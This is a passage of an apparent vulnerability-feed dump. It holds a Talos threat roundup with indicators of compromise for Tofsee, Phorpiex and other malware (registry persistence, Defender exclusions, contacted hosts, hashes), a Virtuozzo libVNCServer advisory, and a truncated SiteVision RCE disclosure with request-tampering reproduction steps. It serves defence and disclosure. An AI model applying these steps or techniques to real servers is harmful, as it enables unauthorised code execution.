\nValue Name: ErrorControl ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: ImagePath ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: DisplayName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: WOW64 ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 13 \n`Global\\M98B68E3C` | 13 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \n`Global\\Nx534F51BC` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`59[.]110[.]18[.]236` | 15 \n`103[.]211[.]218[.]205` | 15 \n`45[.]56[.]88[.]91` | 12 \n`51[.]254[.]137[.]156` | 8 \n`192[.]241[.]131[.]79` | 7 \n`51[.]68[.]220[.]244` | 6 \n`206[.]81[.]10[.]215` | 4 \n`217[.]149[.]241[.]121` | 3 \n`74[.]208[.]5[.]15` | 2 \n`169[.]254[.]255[.]255` | 2 \n`17[.]36[.]205[.]74` | 1 \n`173[.]194[.]204[.]109` | 1 \n`94[.]100[.]180[.]160` | 1 \n`107[.]14[.]73[.]68` | 1 \n`81[.]88[.]48[.]66` | 1 \n`184[.]106[.]54[.]11` | 1 \n`208[.]124[.]213[.]186` | 1 \n`95[.]216[.]33[.]71` | 1 \n`64[.]41[.]126[.]110` | 1 \n`64[.]98[.]36[.]173` | 1 \n`94[.]152[.]153[.]134` | 1 \n`143[.]95[.]235[.]37` | 1 \n`216[.]177[.]141[.]15` | 1 \n`52[.]96[.]38[.]82` | 1 \n`173[.]254[.]28[.]125` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`headonizm[.]in` | 15 \n`qantimagroup[.]com` | 8 \n`smtp[.]mail[.]com` | 2 \n`smtpout[.]secureserver[.]net` | 2 \n`smtp-mail[.]outlook[.]com` | 1 \n`smtp[.]mail[.]ru` | 1 \n`ssl0[.]ovh[.]net` | 1 \n`smtp[.]qiye[.]163[.]com` | 1 \n`mail1[.]hostingplatform[.]com` | 1 \n`smtp[.]corteshermanos[.]com` | 1 \n`mail[.]rekaicentres[.]com` | 1 \n`mail[.]fusat[.]cl` | 1 \n`mail[.]hces[.]net` | 1 \n`mail[.]mccmh[.]net` | 1 \n`manabi[.]ecuahosting[.]net` | 1 \n`smtp[.]cuttingedgestoneworks[.]com` | 1 \n`p52-smtp[.]mail[.]me[.]com` | 1 \n`smtp[.]siteprotect[.]com` | 1 \n`lawyers-mail[.]com` | 1 \n`mail[.]ec[.]rr[.]com` | 1 \n`just125[.]justhost[.]com` | 1 \n`mail[.]effinger-zentrum[.]ch` | 1 \n`mail[.]smscomm[.]net` | 1 \n`authsmtp[.]securemail[.]pro` | 1 \n`mail[.]lignum[.]com[.]gt` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\419.exe` | 15 \n`%ProgramData%\\Microsoft\\Crypto\\RSA\\S-1-5-18\\9bdfb692c085f99347f09462e5cd5445_9979f91c-9ae8-458a-b442-fe95beaeef26` | 2 \n`%ProgramData%\\gny7.exe` | 1 \n \n#### File Hashes\n\n` 0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab 1220dd6c5523dc0b6b6409e5b739216bc979826bcb8e43428f0889ff120fd63d 1ff11781388f142f3dd92900380de4501f12f652d20911b502dbea6d4e7c2533 2c9b1c7443421bc46987ae098dd00fa013b9722dfe6b6b518c3ab474d888d984 456f0957a36e00bf03b0e37d18e119d74b3bb08054f6248a2e7e87ddb93d7782 4bbdbcf77feea35ec8ebddead4ed7274c8404c5fe2df5d24029488424f1ce875 81fc2cb7ae6b7006b185b89427136ab8a520cbd687d0bbb5f1fc31b1a1c0f4ba 83fe7400534e8efcc5cec209b9b2835d61be0d88914bbfd6495fb675378aa2dd 8c483708b5b4230562f3d0d4dce10c6168b94ccb6e85ff5052c42513feda741e 9f48da5cd641b0bb9dffd3dec5d2442da67ed23367331eb8c181fc61ee54c41e c8078630214d7c029d23de03dedb7fab8a2f7f8df12ba99245682e3ca235179b ce11fa55f6717dadca7bdd3759b3d46217d085e78ea8bb94bb8145754741b5c5 e0ab84847c95820096ec02c1c23c15589320ddc180e6d9f0d61315409b755dc8 
e74421edc6c5a113acbd4f754d64ac9502f59cbdae14ffa129357bc5251e9afc f3de992434fc44f62318ddbe2c209a11af19205bb347dac52d7534e7f3c5579a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZZGz7Mw7Z8U/XeqUJI0xf6I/AAAAAAAAC9s/gCkvLQHcGbYVoXxZKDwD5r7a7djm_ECdQCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-zTR6IMeKMG0/XeqUMrUQ9xI/AAAAAAAAC9w/x5eFuJAC-ksnhUZjpPzuyOuynw7TKP5dACLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-NaxAqYMkXLI/XeqUTyXXz6I/AAAAAAAAC94/2QIMSLmZj-8C7xCUmyUpHkVsZc-l2fQOQCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-KEWZIPleWss/XeqURNjr6gI/AAAAAAAAC90/PMISEvUv2jAWPB8fjlwfqfJroX0So17ywCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7431752-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 14 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 11 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 9 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lesyxfla ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\rkyedlrg ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jcqwvdjy ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\dwkqpxds ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fymsrzfu ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xqekjrxm ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: 
C:\\Windows\\SysWOW64\\qjxdckqf ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`67[.]195[.]228[.]110/31` | 15 \n`172[.]217[.]197[.]26/31` | 15 \n`69[.]55[.]5[.]250` | 14 \n`43[.]231[.]4[.]7` | 14 \n`64[.]233[.]186[.]26/31` | 14 \n`81[.]19[.]78[.]64/30` | 14 \n`98[.]136[.]96[.]74/31` | 14 \n`98[.]136[.]96[.]76/31` | 14 \n`85[.]114[.]134[.]88` | 14 \n`77[.]88[.]21[.]89` | 13 \n`209[.]85[.]202[.]26/31` | 13 \n`172[.]217[.]7[.]132` | 13 \n`213[.]180[.]193[.]89` | 12 \n`67[.]195[.]204[.]72/30` | 12 \n`148[.]163[.]158[.]5` | 11 \n`67[.]195[.]228[.]109` | 11 \n`67[.]195[.]228[.]94` | 10 \n`31[.]31[.]194[.]100/31` | 10 \n`98[.]136[.]96[.]92/31` | 10 \n`46[.]4[.]52[.]109` | 9 \n`67[.]195[.]204[.]79` | 9 \n`46[.]28[.]66[.]2` | 9 \n`78[.]31[.]67[.]23` | 9 \n`188[.]165[.]238[.]150` | 9 \n`93[.]179[.]69[.]109` | 9 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 14 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 14 \n`list[.]ru` | 13 \n`mx0b-001b2d01[.]pphosted[.]com` | 11 \n`mx[.]yandex[.]ru` | 9 \n`yandex[.]ru` | 9 \n`mta5[.]am0[.]yahoodns[.]net` | 9 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 9 \n`aol[.]com` | 9 \n`yahoo[.]co[.]uk` | 9 \n`irina94[.]rusgirls[.]cn` | 9 \n`anastasiasweety[.]rugirls[.]cn` | 9 \n`beautyrus[.]cn` | 9 \n`smtp[.]secureserver[.]net` | 8 \n`mxs[.]mail[.]ru` | 8 \n`mail[.]ru` | 8 \n`mx[.]yandex[.]net` | 8 \n`eur[.]olc[.]protection[.]outlook[.]com` | 8 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 8 \n`mx1[.]emailsrvr[.]com` | 8 \n`mx-apac[.]mail[.]gm0[.]yahoodns[.]net` | 7 \n`bk[.]ru` | 7 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 7 \n`inbox[.]ru` | 7 \n`smtp-in[.]orange[.]fr` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 16 \n`%System32%\\<random, matching 
'[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 14 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 14 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 14 \n`%TEMP%\\hjekdqa.exe` | 1 \n`%TEMP%\\yavbuhr.exe` | 1 \n \n#### File Hashes\n\n` 109ca5f094a4e98b6dac4191043bcbc4a9e849a456ca581226f42fdd7812966a 2835bade0deb4c1f1af1beff0102a7122990fd5b868f82b5f23b5ddea782d862 284d642a2ae70ba3890f39595cf215c06037f514580bcc8766b3c136cb1c4df9 2c84c7ac4fdbcaba7ac72b01a03d5ee7d62db4e4986670d17d420a45872f3158 30cadaa9bbf5f83ebad9e4738db169bacca7f78b4ae4256cc326533099dd64c2 64a3e41af01cf5443314c0d49d7a83f081c99dbadda2dfe2af5d93ff49464f4b 74ac087c43dc71971fddc1d65b4586b57d4b6ec6182914d0d176722a3a70b4bc 7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538 84c98359fa8967beb941ffa16550358d39e1fd005dccbc697267b6f170c08aeb 91637560be3528716ac0c5586b39c763c54798a0b03a55db086a3128fa665fee 973e8cb33dae5fab6505ffb140ad80587081f131bb6bb5305582e874ec8d10b0 d0ec6c954e91bde1e104cec6f316aa1d2f94389883d602790aec0128f492547c e46c3033d16ed60026ee74546aaaf17fe0e0dccfe9c40bd0b434758c01fc8a17 eab97c31815fc018ec26360c575b02ec3cf7595c1c4c6bcd121ee2123335515f eaf18fa3b771523ea252436b6dd15d1c2e0d6f93a17f5a861251dbc38f0cf951 f551911671d006e8164ba14c2024bbe55646f5e1ec6c4fb16b7f199c51be6864 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ufqU73JFz3o/XeqU7lz0kQI/AAAAAAAAC-U/jsKj0JmCJs4JClB6lqkg8u8lYarMfsM_wCLcBGAsYHQ/s1600/7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-O1eXG01gPKk/XeqU_YsqxhI/AAAAAAAAC-Y/bOHq-MRqWrkuGNfTJYNSuI_832awUB2QwCLcBGAsYHQ/s1600/7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/--DsBmJd-k1A/XeqVEntLd1I/AAAAAAAAC-c/B7JsgcpTtBsWGdOMHDsOTJc1CTyGeLMWwCLcBGAsYHQ/s1600/30cadaa9bbf5f83ebad9e4738db169bacca7f78b4ae4256cc326533099dd64c2_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Downloader.Phorpiex-7428338-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SYSTEMRESTORE \nValue Name: DisableSR ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AutoUpdateDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Services ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Services ` | 16 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Driver ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Driver ` | 1 \nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 5 \n`5500330044` | 2 \n`60807405680` | 1 \n`65078708650` | 1 
\n`55970850860` | 1 \n`459500033940` | 1 \n`8855858939` | 1 \n`959505030340` | 1 \n`3949400403930` | 1 \n`974795976050` | 1 \n`56495605470` | 1 \n`8800550044` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`193[.]32[.]161[.]77` | 10 \n`94[.]156[.]133[.]65` | 6 \n`92[.]63[.]197[.]153` | 5 \n`92[.]63[.]197[.]59` | 5 \n`92[.]63[.]197[.]60` | 3 \n`95[.]81[.]1[.]43` | 3 \n`193[.]32[.]161[.]73` | 2 \n`199[.]73[.]55[.]48` | 2 \n`193[.]32[.]161[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`teubeufubg[.]su` | 7 \n`weoghehofu[.]su` | 7 \n`xiheiufisd[.]su` | 7 \n`aieieieros[.]su` | 7 \n`teoghehofu[.]su` | 7 \n`weubeufubg[.]su` | 7 \n`xeoghehofu[.]su` | 7 \n`wniaeninie[.]su` | 7 \n`tieieieros[.]su` | 7 \n`xieieieros[.]su` | 7 \n`aeoghehofu[.]su` | 7 \n`wiaeufaehe[.]su` | 7 \n`weuaueudgs[.]su` | 7 \n`wbaeubuegs[.]su` | 7 \n`wieieieros[.]su` | 7 \n`abaeubuegs[.]su` | 7 \n`tbaeubuegs[.]su` | 7 \n`aniaeninie[.]su` | 7 \n`xbaeubuegs[.]su` | 7 \n`teuaueudgs[.]su` | 7 \n`wiheiufisd[.]su` | 7 \n`xniaeninie[.]su` | 7 \n`tiheiufisd[.]su` | 7 \n`aiheiufisd[.]su` | 7 \n`aeubeufubg[.]su` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\_\\DeviceManager.exe` | 17 \n`\\.lnk` | 17 \n`E:\\.lnk` | 17 \n`E:\\_` | 17 \n`E:\\_\\DeviceManager.exe` | 17 \n`%APPDATA%\\winsvcs.txt` | 16 \n`%SystemRoot%\\2043700216632254` | 2 \n`%SystemRoot%\\2043700216632254\\winpmmt.exe` | 2 \n`%SystemRoot%\\5037867818202168\\winxvbc.exe` | 1 \n`%SystemRoot%\\1751841511079533\\winhlyh.exe` | 1 \n`%SystemRoot%\\1927513612308752\\winqfmt.exe` | 1 \n`%SystemRoot%\\7596387610791212\\winthul.exe` | 1 \n`%SystemRoot%\\19947372186510550` | 1 \n`%SystemRoot%\\19947372186510550\\wingtph.exe` | 1 \n`%SystemRoot%\\7815933519548311` | 1 \n`%SystemRoot%\\7815933519548311\\winpyzz.exe` | 1 \n`%SystemRoot%\\4232647816716713` | 1 
\n`%SystemRoot%\\4232647816716713\\winzsjy.exe` | 1 \n`%SystemRoot%\\9082268219092826` | 1 \n`%SystemRoot%\\9082268219092826\\winzpox.exe` | 1 \n`%SystemRoot%\\6188541715897433` | 1 \n`%SystemRoot%\\6188541715897433\\winngob.exe` | 1 \n`%SystemRoot%\\1917973613436861` | 1 \n`%SystemRoot%\\1917973613436861\\windcnw.exe` | 1 \n`%SystemRoot%\\4140102414092928` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 12c7c57286a5c532800495f1b9c8c5415dbaf5539aec177009845e9ac3508be3 22854dc3febbab0b72663b08bbdda7a4ee4dc501764876b2160a8d982700b4f8 22b67655c0bee80c3afb4da0811ab18da62ca2b053f958864131722708c30be1 506e17946a441837e8c42374d565cfc7331bf2e706124aa122710cf19f380fcf 5150389a6d1c556e7d99671f1d3fbed15e5fd5cf01f26ea9638f08708a77a36f 63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f 6dde1772c9b506f82178de0a14ad8cc7721c5f0dafb22088703b1e8dade3adc6 6f7aa9178d9cfdc6b873d54740d08f8bbb73a53f2d52453ec904d1314f5153b6 75e85527ae7786063af164c13b8c7df2f248cb4e7253d41ef444a3b84aba5219 9c88188624210f684d7aab8447c2fb50882139cca5d1bdac72838c4e76650251 af0e787fd0b006c04b60eb5d69b815d053ef774fa2d0be00a246ce4a018e85cf be5004b5f58595bfdf4cb2f317bc7dfb2d66f50f1adabb177b76fdab997a21bb c0c1e55d87fc372bba9454d65f4f99b64ee2002743f4195cba72bae642beb7f9 cbab761baf4042ba54d4471df336c65cecf253e5d2ad0a61e51199bf4355f3a5 cfc2091a57f78ac04de77c5dd72aae7be27d5633d87b0d104430f50ade7b6a73 e2ac54ca79debd49bbe0efc028d43f6793f23a903f4410003c0eba709cdff406 f0b61687dea12c0981e6226eaa6bfe3889c710b1347c6c8a89eb220bd4dc3204 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-s3KcSHDhVNk/XeqVad3POXI/AAAAAAAAC-o/-2rJP5EFDdMXr03Qde4VjROrv4XzqC3DgCLcBGAsYHQ/s1600/63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rBwtLqqTZaE/XeqVfiaPcOI/AAAAAAAAC-w/DeUNJjLMMqsoZHr1dYTIwz5Y4Xg8Cw36QCLcBGAsYHQ/s1600/63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-UT2OwCX62wM/XeqVmBgj-FI/AAAAAAAAC-0/jTbZpsoBv301wKIGtwkfr2NRnV-V41HPACLcBGAsYHQ/s1600/506e17946a441837e8c42374d565cfc7331bf2e706124aa122710cf19f380fcf_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (15141) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (348) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nDealply adware detected \\- (346) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. 
It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nKovter injection detected \\- (334) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nExcessively long PowerShell command detected \\- (287) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nGamarue malware detected \\- (217) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (110) \nInstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nSpecial Search Offer adware \\- (40) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. 
\nReverse http payload detected \\- (26) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nCorebot malware detected \\- (19) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2019-12-06T10:31:01", "published": "2019-12-06T10:31:01", "id": "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VB8_-mJ1xSE/threat-roundup-1129-1206.html", "type": "talosblog", "title": "Threat Roundup for November 29 to December 6", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-12-06T15:25:27", "bulletinFamily": "unix", "description": "This update provides a security and a stability fix.\n**Vulnerability id:** CVE-2019-15681, PSBM-99817\nlibVNCServer-0.9.10 contains a memory leak in VNC server code, which may allow an attacker to read stack memory.\n\n", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "VZA-2019-093", "href": "https://help.virtuozzo.com/s/article/VZA-2019-093", "title": "Important product security update: Virtuozzo 6.0 Update 12 Hotfix 49 (6.0.12-3754)", "type": "virtuozzo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2019-12-07T10:47:23", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155585", "href": "https://packetstormsecurity.com/files/155585/SiteVision-4.x-5.x-Remote-Code-Execution.html", "title": "SiteVision 4.x / 5.x Remote Code Execution", "type": "packetstorm", "sourceData": "`# 
SiteVision Remote Code Execution \n \nCVE-2019-12733 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12733 \nhttps://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/ \n \n \n## Summary \nAttackers may execute arbitrary code as root on the target server after gaining access to a low-privilege account. \n \n \n## Vendor Description \nSiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision. \n \n \n## Affected Versions \nAll versions of SiteVision 4 until 4.5.6. \nAll versions of SiteVision 5 until 5.1.1. \nEarlier major versions are assumed to be vulnerable. \n \n \n## Technical Details \nThe SiteVision application does not sufficiently validate whether or not the current user is permitted to add or edit modules of the \"script\" type. This means that a low-privilege user such as an Editor (\"Redakt\u00f6r\") can inject a new script module, or edit an existing one, and leverage it to execute arbitrary code. \n \nThe access control flaw allowing users to inject non-authorized modules is described separately in CVE-2019-12734. \n \nWhile the scripts are written in JavaScript, the environment allows the developer to reach and import Java APIs. \n \nReproduced on SiteVision 4 and 5; the following steps apply to SiteVision 5: \n \n1. Install SiteVision and either create or import a new site. \n2. Set up and create an Editor (\"Redakt\u00f6r\") user. \n3. Log on as the new low-privilege user. \n4. Create a new page and note how only basic modules are available. \n5. Insert a text module. \n6. Re-send the HTTP request generated in step #5, but change the value of portletType from \"text\" to \"script\". 
